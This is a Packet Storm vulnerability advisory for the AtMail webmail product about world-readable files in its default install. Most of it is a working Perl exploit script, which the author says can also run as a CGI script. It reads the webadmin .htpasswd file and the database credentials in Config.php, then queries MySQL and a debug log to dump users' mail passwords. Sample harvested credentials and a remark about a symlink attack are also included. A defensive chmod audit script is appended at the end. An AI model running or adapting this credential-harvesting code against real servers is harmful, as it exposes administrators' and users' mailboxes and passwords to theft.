
atmail-disclose.txt

Date: 31 Jul 2008 | Reported by: injusticeinamerica | Type: packetstorm | Source: packetstormsecurity.com

AtMail by CalaCode ships with world-readable files in the default install, leading to sensitive information disclosure and loss of integrity. The vendor has not fixed the issue and is pushing the product at HostingCon. The issue is easily abused by anyone who can run shell commands on the host, without requiring SSH authentication. The exposed data includes various user credentials and database credentials, and client information persists in the database.

Code
```perl
#!/usr/bin/perl

################################################################################
#
# LEGAL:
# Permission is granted to freely reproduce this document in its entirety
# under the condition that the contents are not altered in any way.
# milw0rm IS permitted to add their standard footer: // milw0rm.com / date
# Permission to view or reproduce this file is NOT granted to any
# individual with the first name Gadi and the last name Evron, due to the
# prior history of at least 1 individual with this name of making false
# claims that researchers notified them about recently released exploits.
#
# PRODUCT:
# AtMail - atmail.com
#
# VENDOR:
# CalaCode - calacode.com
#
# DOWNLOAD:
# http://atmail.org/download/atmailopen.tgz
# http://atmail.com/demo/atmailphpdemo.tgz
#
# PROBLEM:
# World readable files in the default install lead to sensitive
# information disclosure, loss of integrity.
#
# SOLUTION:
# chmod 640 /path/to/Config.php /path/to/.htpasswd
#
# NOTIFICATION:
# 5/27/2008 - Several emails were sent back and forth, explaining how the
# world readable Config.php issue could be abused. Multiple subsequent
# attempts to obtain a status update from the vendor were unreplied to.
# It's now 07/29/2008. Instead of taking a few moments of their time to
# bring the level of security of the servers this software is installed
# on back up to the same level it was BEFORE this software was installed
# (excluding any other vulnerabilities that may exist in this software),
# the vendor is happily pushing their product at HostingCon at this time.
# (JULY 28-30, 2008).
#
# STATUS:
# Not fixed.
#
# USAGE:
# ./atmail.pl
#
# or simply use it as a CGI script. The vendor claims that ssh access is
# required to abuse this issue. What they really mean is that all someone
# needs is the ability to invoke a few commands from the shell. This is
# easily done in countless ways without requiring authentication via ssh.
#
# +----------------------------------------------------+
# | WEBADMIN USER CREDENTIALS (.htpasswd) |
# +----------------------------------------------------+
# admin:$apr1$L.BPJMnK$sjep5SUN4PG5A.Anw5/Id0
#
# +----------------------------------------------------+
# | DATABASE CREDENTIALS (Config.php) |
# +----------------------------------------------------+
# USER: atmail
# PASS: AF4hubB493
# HOST: localhost
#
# +----------------------------------------------------+
# | CLIENT CREDENTIALS (MySQL) |
# +----------------------------------------------------+
# USER: [email protected] PASS: atmail
# USER: [email protected] PASS: doesn't
# USER: [email protected] PASS: getit
#
# +----------------------------------------------------+
# | MORE CLIENT CREDENTIALS (/tmp/popimap_debug) |
# +----------------------------------------------------+
# USER: alice PASS: atmail
# USER: bob PASS: doesn't
# USER: carol PASS: getit
#
#
# ADDED BONUS: client information persists in the database even after the user
# has logged off.
#
# To make this code work, you must fill in the paths. I don't condone
# malicious use of the information provided in this script, just as I don't
# condone vendor complacency.
#
# If you have found any of this information to be useful to you or someone
# you know, PLEASE consider donating to the Julie Amero Defense Fund:
#
# Official Blog
# http://julieamer.blogspot.com
#
# Trial Transcript
# http://julieamero.blogspot.com
#
# http://google.com/search?q=julie+amero
#
# and/or contacting news outlets, state legislators, the prosecution, etc and
# letting them know your thoughts in a polite and professional manner.
#
################################################################################

# print "Content-type: text/plain\n\n";

use strict;
use warnings;

my $atmail_path = shift || '';
my $atmail_htpasswd_path = $atmail_path . '';
my $atmail_config_path = $atmail_path . '';
my $atmail_popimap_debug = '';

my ( $sql_user, $sql_pass, $sql_host );

-e $atmail_path or die "$atmail_path does not exist\n";


###############################################################################
# For logging into https://example.com/atmail/webadmin
###############################################################################
if ( open my $atmail_htpasswd_path_fh, '<', $atmail_htpasswd_path )
{
    print_line();
    print "|\tWEBADMIN USER CREDENTIALS (.htpasswd) |\n";
    print_line();

    while ( <$atmail_htpasswd_path_fh> ) {
        print;
    }

    close $atmail_htpasswd_path_fh;

    print "\n";

}

###############################################################################
# For accessing the atmail db
###############################################################################
if ( open my $atmail_config_fh, '<', $atmail_config_path )
{
    print_line();
    print "|\tDATABASE CREDENTIALS (Config.php) |\n";
    print_line();

    while ( <$atmail_config_fh> )
    {
        $sql_user = $1 if ( m{ sql_user ' \s => \s ' (.*) ' , }ixms );
        $sql_pass = $1 if ( m{ sql_pass ' \s => \s ' (.*) ' , }ixms );
        $sql_host = $1 if ( m{ sql_host ' \s => \s ' (.*) ' , }ixms );
    }

    close $atmail_config_fh;

    print "USER: $sql_user\nPASS: $sql_pass\nHOST: $sql_host\n";

    print "\n";
}

###############################################################################
# For reading grandma's email
###############################################################################
my $sessions = "mysql -h $sql_host -u $sql_user -p$sql_pass atmail -e 'select * from UserSession \\G'";

if ( open my $mysql_fh, '-|', $sessions )
{
    print_line();
    print "|\tCLIENT CREDENTIALS (MySQL) |\n";
    print_line();

    while ( <$mysql_fh> )
    {
        if ( m{ Account: \s (\S+) }xms ) {
            print "USER: $1\t";
        }
        elsif ( m{ Password: \s (\S+) }xms ) {
            print "PASS: $1\n";
        }
    }

    close $mysql_fh;

    print "\n";
}
###############################################################################
# Debugging is not enabled by default, and you do have the choice of
# configuring the location of the debug log. The default is /tmp/popimap_debug
# which also presents a symlink attack issue if left to the default setting.
###############################################################################
if ( open my $popimap_debug_fh, '<', '/tmp/popimap_debug' )
{
    my %accounts;

    print_line();
    print "|\tMORE CLIENT CREDENTIALS (/tmp/popimap_debug) |\n";
    print_line();

    my ( $popimap_debug_user, $popimap_debug_pass );

    while ( <$popimap_debug_fh> )
    {
        if ( m{ \A C: \s ATMAIL00 \s LOGIN \s "(.*)" \s "(.*)" }ixms ) {
            $accounts{$1} = $2;
        }
    }

    close $popimap_debug_fh;

    while ( my ( $user, $pass ) = each ( %accounts ) ) {
        print "USER: $user\tPASS: $pass\n";
    }

    print "\n";
}

sub print_line
{
    print "+----------------------------------------------------+\n";
}
```
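
The advisory's SOLUTION line (`chmod 640` on `Config.php` and `.htpasswd`) and its remark about the default `/tmp/popimap_debug` log can be checked from the administrator's side. The script below is an added example, not part of the original advisory or of AtMail; its function names are hypothetical, and the install root is passed as an argument because the advisory leaves the paths unspecified.

```shell
#!/bin/sh
# Added example: defender-side audit for the file modes the advisory describes.
# Function names are hypothetical; the install root is supplied by the caller.

# Print every Config.php / .htpasswd under root $1 that "other" can read.
atmail_world_readable() {
    find "$1" -type f \( -name Config.php -o -name .htpasswd \) \
        -perm -004 -print
}

# Apply the advisory's "chmod 640" to each flagged file and report it.
atmail_fix_modes() {
    atmail_world_readable "$1" | while IFS= read -r f; do
        chmod 640 "$f" && printf 'fixed %s\n' "$f"
    done
}

# Classify the POP/IMAP debug log at path $1:
#   symlink        - path is a symlink (the symlink issue the advisory notes)
#   absent         - debugging is off or the log lives elsewhere
#   world-readable - logged LOGIN lines are exposed to every local user
#   ok             - regular file without the "other" read bit
debug_log_status() {
    if [ -L "$1" ]; then
        echo symlink
    elif [ ! -e "$1" ]; then
        echo absent
    elif [ -n "$(find "$1" -prune -perm -004 -print)" ]; then
        echo world-readable
    else
        echo ok
    fi
}

# Stand-alone use: ./audit.sh /path/to/atmail [/tmp/popimap_debug]
if [ "$#" -ge 1 ]; then
    atmail_world_readable "$1"
    echo "debug log: $(debug_log_status "${2:-/tmp/popimap_debug}")"
fi
```

After `chmod 640`, the web server account must own the files or belong to their group, otherwise AtMail itself can no longer read them.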
